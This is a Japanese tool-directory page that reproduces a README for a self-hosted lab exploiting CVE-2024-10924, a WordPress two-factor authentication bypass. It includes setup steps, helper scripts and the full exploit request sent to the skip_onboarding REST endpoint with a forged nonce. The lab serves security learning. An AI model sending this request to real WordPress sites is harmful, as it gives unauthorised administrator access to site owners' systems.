Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10924-Bypass-MFA-Wordpress-LAB | Kitploit
ツール/GitHubGitHub/d1se0/cve-2024-10924-bypass-mfa-wordpress-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト認証学習と教育ラボと実践
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
d1se0/cve-2024-10924-bypass-mfa-wordpress-lab

CVE-2024-10924-Bypass-MFA-Wordpress-LAB

リポジトリを見る
41年前未レビュー

CVE-2024-10924 MFAバイパス WordPress - エクスプロイトラボ

このリポジトリは、WordPress の CVE-2024-10924 脆弱性を悪用して、二要素認証(MFA)をバイパスし、WordPress 管理パネルへのアクセスを取得するためのラボを提供します。

前提条件

このラボを自分の環境に展開するには、以下の手順に従ってください。

VMware に WordPress をデプロイする

LAB の zip を解凍し、VMware で Open をクリックしてマシンをインポートします。Ubuntu-Bypass-MFA-Wordpress.vmx というファイルを選択し、最後に Power をクリックして脆弱なマシンを起動します。

ラボをダウンロード

Kali Linux を構成する

Kali マシンに必要なツールをインストールし、以下のアプリケーションがインストールされていることを確認してください。

  • nmap: ネットワークスキャンを実行するため。
  • requests: HTTP リクエストを行うため(ない場合は pip install requests で requests をインストールしてください)。
  • rich: コンソールへの見やすい出力のため(pip install rich でインストールしてください)。

WordPress マシンの IP を取得する

ネットワーク環境内の WordPress マシンの IP を取得するには、Kali マシンから次のスクリプトを実行します。

root@kitploit:~
$ python3 knowIPwordpress.py
root@kitploit:~
このスクリプトは次のことを行います:

お使いのローカル IP を検出します。 対応するネットワークセグメントをスキャンして、アクティブな IP を探します。 HTTP サービスのポートスキャンを実行します。 WordPress マシンの IP の HTTP サービスに "Bypass-MFA" というタイトルがあるか確認します。 見つかったら、WordPress 管理パネルにアクセスできる URL が表示されます。

root@kitploit:~
Accede a WordPress en: http://<IP>/wp-admin

二重チェックのバイパス(MFA):

WordPress の認証情報:

root@kitploit:~
admin:admin

WordPress にログインしようとすると、二要素認証(MFA)を求められます。この手順をバイパスするには、Kali で次のスクリプトを実行します。

root@kitploit:~
$ python3 bypass-MFA-Wordpress.py

bypass-MFA-Wordpress.py スクリプトの仕組み このスクリプトは CVE-2024-10924 脆弱性を悪用して二重認証をバイパスし、WordPress 管理パネルへのアクセスを取得します。

スクリプトの流れ:

セッションクッキーの取得:スクリプトは reallysimplessl/v1/two_fa/skip_onboarding エンドポイントに HTTP リクエストを送信して、有効なセッションクッキーを取得します。

リクエストは次の情報とともに送信されます:

root@kitploit:~
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

ログインリクエスト:

クッキーを取得した後、スクリプトは WordPress のユーザー名とパスワードを要求します。次に、提供された認証情報を使用して wp-admin/profile.php エンドポイントに POST リクエストを送信し、ログインします。

HTMLファイルの生成:

バイパスが成功した場合、スクリプトは管理者ダッシュボードからの応答を .html ファイルに保存し、デフォルトのブラウザで開きます。

これで WordPress 管理パネルにアクセスできるようになります!

手動による Bypass-MFA-Wordpress の方法:

BurpSuite を使用して手動で実行し、Cookies を取得するためにリクエストを送信する必要がある Endpoint を確認したい場合は、次の方法で行えます。

root@kitploit:~
$ python3 endpointWordpress.py

これにより、Cookies を取得するために BurpSuite に入力する必要があるコードが表示されます。私の場合は次のようになります:

root@kitploit:~
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

ビデオ形式での手動テクニックの実行:

https://github.com/user-attachments/assets/e70789d1-4fe4-46b4-81ef-76229dd265ce

詳細は私の YT ビデオで:

LINK = Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB

ツールをダウンロード